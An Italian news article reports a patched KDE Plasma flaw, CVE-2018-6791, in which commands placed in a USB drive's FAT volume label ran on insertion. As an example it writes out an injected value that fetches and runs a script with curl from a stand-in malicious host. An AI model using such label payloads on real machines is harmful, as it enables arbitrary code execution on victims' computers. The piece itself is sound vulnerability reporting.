Quando il nome di una chiavetta è fonte di exploit: scivolone di KDE Plasma

KDE Plasma, uno tra i primi ambienti desktop sviluppati per Linux, soffriva di una grave vulnerabilità ora corretta: nelle versioni precedenti alla 5.12, rilasciata pochi giorni fa, era possibile eseguire comandi arbitrari semplicemente inserendoli nell'etichetta di un dispositivo di archiviazione portatile come una chiavetta USB.

La vulnerabilità permetteva a un attaccante di eseguire comandi semplicemente inserendoli nell'etichetta di un volume FAT (FAT, FAT32, VFAT). Affinché questo fosse possibile, era necessario inserire i comandi tra i caratteri `` o $() - ad esempio `reboot` (nel caso più innocuo) o $(curl http://scaricaunmalware.com/file.sh | sh) (che scarica un file e lo esegue) - e KDE Plasma avrebbe provveduto a eseguire tale codice al collegamento del dispositivo. Ovviamente la fantasia vola in questi casi ed è facile immaginare danni anche gravi, ad esempio con comandi che possono cancellare il contenuto della cartella home o scaricare eseguibili malevoli.

La vulnerabilità, nota come CVE-2018-6791, è stata corretta con il rilascio di KDE Plasma 5.12 e, come scrive Phoronix, il team sta lavorando alla correzione anche nelle versioni precedenti ancora in uso in alcune distribuzioni.

Ovviamente è necessario avere accesso fisico alla macchina che si vuole attaccare e questo limita le possibilità di attacco, ma questo rimane un problema non da poco che il progetto KDE si è lasciato sfuggire. La vulnerabilità è stata resa nota solo dopo la diffusione dell'aggiornamento alla nuova versione dell'ambiente senza il problema.